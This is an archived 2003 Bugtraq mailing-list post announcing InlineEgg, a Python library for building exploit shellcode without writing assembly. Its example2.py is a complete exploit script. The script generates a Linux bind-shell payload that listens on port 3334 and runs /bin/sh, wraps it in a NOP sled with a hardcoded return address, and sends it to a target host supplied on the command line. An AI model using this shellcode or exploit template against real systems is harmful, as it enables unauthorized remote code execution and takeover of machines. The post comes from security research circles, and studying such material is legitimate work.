InlineEgg library release

To: gera@xxxxxxxxxx
Subject: InlineEgg library release
From: Gerardo Richarte <gera@xxxxxxxxxx>
Date: Thu, 04 Sep 2003 19:35:55 -0300
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

We'd like to share with you the release of InlineEgg 1.0. the followingis a reduced version of theREADME available athttp://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html,

the same page points to the .tar.gz


Welcome to InlineEgg.

Short version:

InlineEgg is a collection of python classes (a "library"), that willhelp

you write small assembly programs, either to use as eggs/shellcode for your
exploits or for anything else you may need small assembly programs for. But!
without writing assembly, just using python.

   InlineEgg is now included in CORE IMPACT as another component of its egg

creation framework, but it started as a pretty simple idea to fulfill apretty

simple need. We hope that you find it helpful for your own creations, so we
are releasing it under an opensource license for non commercial uses.

Long version:

A simple need: When writing exploits for remote code executionvulnerabilities(yes, that's what we do part of the time), you usually need to havea smallassembly program that will be sent to the vulnerable application aspart of

   the exploiting process. Historically, this small pieces of assembly code
   (eggs) were hardcoded as dead strings in the middle of the exploit. But,

although having the strings handy gave the exploit writer somereusability

   and some flexibility, we sometimes needed more, we even needed the
   possiblity of creating our small assembly programs in runtime, and make

them addapt to the situation... well, there are lots of differentsolutionsto the problem, but as I already had some ideas on how to do it, Ijumped

   into python.

A simple idea: Do something that lets us create small assembly programs by
   concatenating system calls, giving us the possibility of changing the
   arguments to the system calls, and adding more code when needed...

   [...]

--- example2.py -----------------------------------------
#!/usr/bin/python

from inlineegg import *
import socket
import struct
import sys

def listenShellEgg(listen_addr, listen_port):

#   egg = InlineEgg(FreeBSDx86Syscall)
#   egg = InlineEgg(OpenBSDx86Syscall)
  egg = InlineEgg(Linuxx86Syscall)

  # bind to port and listen
  sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM)

sock = egg.save(sock) # save the socket in avariable (in stack)egg.bind(sock, (listen_addr, listen_port)) # sock is now thevariable, and it's used from the stack

  egg.listen(sock,1)

  client = egg.accept(sock, 0, 0)
  client = egg.save(client)
  egg.close(sock)

  egg.dup2(client, 0)
  egg.dup2(client, 1)
  egg.dup2(client, 2)
  egg.execve('/bin/sh',('bash','-i'))

  print "Egg len: %d" % len(egg)
  return egg

def main():
  if len(sys.argv) < 3:
     raise Exception, "Usage: %s <target ip> <target port>"

  # connect to target
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((sys.argv[1], int(sys.argv[2])))

  # create egg
  egg = listenShellEgg('0.0.0.0',3334)

  # exploit

  retAddr = struct.pack('<L',0xbffffc24L)
  toSend  = "\x90"*(1024-len(egg))
  toSend += egg.getCode()
  toSend += retAddr*20

  sock.send(toSend)

main()
---------------------------------------------------------

   [...]

InlineEgg:http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html


   I hope you find it useful and enjoy it,
   gera

Prev by Date: Stack Overflow by SIMPLESEM's abstraction
Next by Date: RE: Microsoft Security Update
Previous by thread: Stack Overflow by SIMPLESEM's abstraction
Next by thread: [SECURITY] [DSA-376-1] New exim, exim-tls packages fix buffer overflow
Index(es):
- Date
- Thread